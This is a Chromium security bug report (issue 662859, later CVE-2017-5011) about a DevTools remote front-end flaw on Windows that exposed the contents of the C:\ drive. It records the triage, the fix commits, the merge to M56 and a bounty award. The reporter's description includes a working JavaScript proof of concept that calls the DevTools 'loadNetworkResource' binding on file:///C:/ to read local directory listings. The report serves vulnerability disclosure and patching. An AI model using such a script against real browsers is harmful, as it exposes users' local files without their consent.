New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Verified
Owner:
Closed: Jan 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 662859: Security: chrome-devtools protocol allows to read the content of C:\ drive

Reported by chromium...@gmail.com, Nov 7 2016

Issue description

VERSION
Chrome Version: 56.0.2912.0
Operating System: Win7

REPRODUCTION CASE
1. Navigate to chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html
2. Navigate to the link below in chrome-dev.txt (on the same tab)
3. Observe

Demo Attack Script [pre-encoding]:

function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();elsef();
 
chrome-dev.txt
1.7 KB View Download
Recording.mp4
838 KB View Download

Comment 1 by elawrence@chromium.org, Nov 7 2016

Components: Platform>DevTools
Looks very similar to 653134; I'm not sure how it differs?

Comment 2 by chromium...@gmail.com, Nov 7 2016

Yeah, but in this report I used the first step to repro.

Comment 3 by est...@chromium.org, Nov 7 2016

Labels: Security_Severity-High M-56 OS-Windows
Owner: dgozman@chromium.org
Status: Assigned (was: Unconfirmed)
Does this repro on stable or canary only? (I don't have a windows machine handy to check.)

Comment 4 by chromium...@gmail.com, Nov 7 2016

I couldn't repro this on 54.0.2840.87 (stable).

Comment 5 by nparker@chromium.org, Nov 8 2016

Labels: Security_Impact-Head

Comment 6 by sheriffbot@chromium.org, Nov 8 2016

Project Member
Labels: ReleaseBlock-Beta
This issue is a security regression. If you are not able to fix this quickly, please revert the change that introduced it.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 7 by sheriffbot@chromium.org, Nov 8 2016

Project Member
Labels: Pri-1

Comment 8 Deleted

Comment 9 by chromium...@gmail.com, Nov 15 2016

Any updates on this bug? thanks.

Comment 10 by sheriffbot@chromium.org, Nov 21 2016

Project Member
dgozman: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 11 by chromium...@gmail.com, Nov 30 2016

Dgozman@ Could you please take a look at this issue? - Thanks :).

Comment 12 by sheriffbot@chromium.org, Dec 2 2016

Project Member
Labels: -Security_Impact-Head Security_Impact-Beta

Comment 13 by sheriffbot@chromium.org, Dec 5 2016

Project Member
dgozman: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 14 by awhalley@google.com, Dec 7 2016

Labels: -ReleaseBlock-Beta -Security_Impact-Beta ReleaseBlock-Stable Security_Impact-Stable
Impact stable per #8

Comment 15 by chromium...@gmail.com, Dec 19 2016

This bug seems like has forgotten.

Comment 16 by dgozman@chromium.org, Dec 27 2016

Cc: caseq@chromium.org

Comment 17 by caseq@chromium.org, Dec 28 2016

Cc: -caseq@chromium.org dgozman@chromium.org
Owner: caseq@chromium.org
Status: Started (was: Assigned)
Note this is not a recent regression -- I've been able to reproduce this on m55 (stable) as well.

Comment 18 by bugdroid1@chromium.org, Dec 29 2016

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/eea3300239f0b53e172a320eb8de59d0bea65f27

commit eea3300239f0b53e172a320eb8de59d0bea65f27
Author: caseq <caseq@chromium.org>
Date: Thu Dec 29 02:19:18 2016

DevTools: move front-end URL handling to DevToolsUIBindingds

BUG= 662859 

Review-Url: https://codereview.chromium.org/2607833002
Cr-Commit-Position: refs/heads/master@{#440926}

[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/test/BUILD.gn

Comment 19 by chromium...@gmail.com, Jan 2 2017

Verified on 57.0.2969.1 (Canary). Fixed.

Comment 20 by awhalley@chromium.org, Jan 2 2017

Status: Verified (was: Started)

Comment 21 by awhalley@chromium.org, Jan 2 2017

Labels: reward-topanel

Comment 22 by sheriffbot@chromium.org, Jan 3 2017

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 23 by sheriffbot@chromium.org, Jan 5 2017

Project Member
Labels: Merge-Request-56

Comment 24 by sheriffbot@chromium.org, Jan 5 2017

Project Member
Labels: -Merge-Request-56 Hotlist-Merge-Approved Merge-Approved-56
Your change meets the bar and is auto-approved for M56. Please go ahead and merge the CL manually. Please contact milestone owner if you have questions.
Owners: amineer@(clank), cmasso@(bling), gkihumba@(cros), bustamante@(desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 25 by caseq@chromium.org, Jan 6 2017

Cc: pfeldman@chromium.org

Comment 26 by bugdroid1@chromium.org, Jan 11 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/714ce74842af647ab192124910b08a07ee7d606b

commit 714ce74842af647ab192124910b08a07ee7d606b
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 01:31:09 2017

Revert of DevTools: move front-end URL handling to DevToolsUIBindingds (patchset #2 id:40001 of https://codereview.chromium.org/2607833002/ )

Reason for revert:
A better fix is coming, reverting this one to make it a part of the new fix so that one CL may be merged onto a branch.

Original issue's description:
> DevTools: move front-end URL handling to DevToolsUIBindingds
>
> BUG= 662859 
>
> Committed: https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27
> Cr-Commit-Position: refs/heads/master@{#440926}

TBR=dgozman@chromium.org
# Not skipping CQ checks because original CL landed more than 1 days ago.
BUG= 662859 

Review-Url: https://codereview.chromium.org/2620193002
Cr-Commit-Position: refs/heads/master@{#442758}

[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_window.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.h
[rename] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/test/BUILD.gn

Comment 27 by bugdroid1@chromium.org, Jan 11 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c2db881506f5709433a5bf6ed981b1bc0c860598

commit c2db881506f5709433a5bf6ed981b1bc0c860598
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 03:39:32 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindingds

This also re-lands https://codereview.chromium.org/2607833002

BUG= 662859 , 678035 

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}

[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/test/BUILD.gn

Comment 28 by awhalley@chromium.org, Jan 12 2017

Labels: -reward-topanel reward-3000 reward-unpaid
Greetings!  The panel took a look at this and decided to reward $3,000!  Please note that's only because this bug can be triggered from an untrusted extension. The amount of user interaction required in the bug as reported would have made it unlikely to receive a reward.

Comment 29 by chromium...@gmail.com, Jan 12 2017

Thanks Andrew! :)

Comment 30 by awhalley@chromium.org, Jan 17 2017

Hi caseq@ - mind doing the merge to M56?

Comment 31 by awhalley@chromium.org, Jan 17 2017

Labels: -reward-unpaid reward-inprocess

Comment 32 by bugdroid1@chromium.org, Jan 24 2017

Project Member
Labels: -merge-approved-56 merge-merged-2924
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/d6f1c251f409263302a2df863df61314418dc4b2

commit d6f1c251f409263302a2df863df61314418dc4b2
Author: Andrey Kosyakov <caseq@chromium.org>
Date: Tue Jan 24 03:21:21 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindingds

This also re-lands https://codereview.chromium.org/2607833002

BUG= 662859 , 678035 

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}
(cherry picked from commit c2db881506f5709433a5bf6ed981b1bc0c860598)

Review-Url: https://codereview.chromium.org/2653783003 .
Cr-Commit-Position: refs/branch-heads/2924@{#853}
Cr-Branched-From: 3a87aecc31cd1ffe751dd72c04e5a96a1fc8108a-refs/heads/master@{#433059}

[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/test/BUILD.gn

Comment 33 by awhalley@chromium.org, Jan 24 2017

Labels: Release-0-M56

Comment 34 by awhalley@chromium.org, Jan 24 2017

Labels: -ReleaseBlock-Stable

Comment 35 by awhalley@chromium.org, Jan 25 2017

Labels: CVE-2017-5011

Comment 36 by sheriffbot@chromium.org, Apr 11 2017

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 37 by bugdroid1@chromium.org, Nov 15 2017

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/484f731aaead5d72c26a21ea012cd2a706146f19

commit 484f731aaead5d72c26a21ea012cd2a706146f19
Author: Andrey Kosyakov <caseq@chromium.org>
Date: Wed Nov 15 18:35:06 2017

DevTools: validate remote front-end URLs

- validate a remote front-end URL before fetching it;
- only expose bindings in window if opener has bindings or there's
    no opener.

Bug:  662859 
Change-Id: I3a5619b78dbd29dc730f37d704a212ecad8bbb54
Reviewed-on: https://chromium-review.googlesource.com/770511
Reviewed-by: Dmitry Gozman <dgozman@chromium.org>
Commit-Queue: Andrey Kosyakov <caseq@chromium.org>
Cr-Commit-Position: refs/heads/master@{#516756}
[modify] https://crrev.com/484f731aaead5d72c26a21ea012cd2a706146f19/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/484f731aaead5d72c26a21ea012cd2a706146f19/chrome/browser/devtools/devtools_ui_bindings.h
[modify] https://crrev.com/484f731aaead5d72c26a21ea012cd2a706146f19/chrome/browser/ui/webui/devtools_ui.cc

Comment 38 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment